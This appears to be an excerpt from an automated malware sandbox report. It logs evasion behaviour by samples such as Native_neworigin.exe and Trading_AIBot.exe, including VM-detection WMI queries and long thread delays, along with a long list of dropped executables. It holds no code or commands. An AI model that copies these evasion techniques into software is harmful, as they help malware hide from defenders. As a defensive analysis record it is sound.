                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2F80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: DB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5E70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2DE70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199841
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199722
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199597
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198821
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198614
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198392
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198072
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197864
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197704
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197560
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197387
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197208
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197052
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196735
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196096
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195729
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195572
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195393
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195265
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195137
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1194990
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 3172
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 1615
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4613
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
                    Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
                    Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5700Thread sleep count: 3172 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99857s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99734s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99616s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99490s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99340s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5700Thread sleep count: 1615 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99213s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -99059s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98933s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98745s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98601s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4808Thread sleep time: -98453s >= -30000s
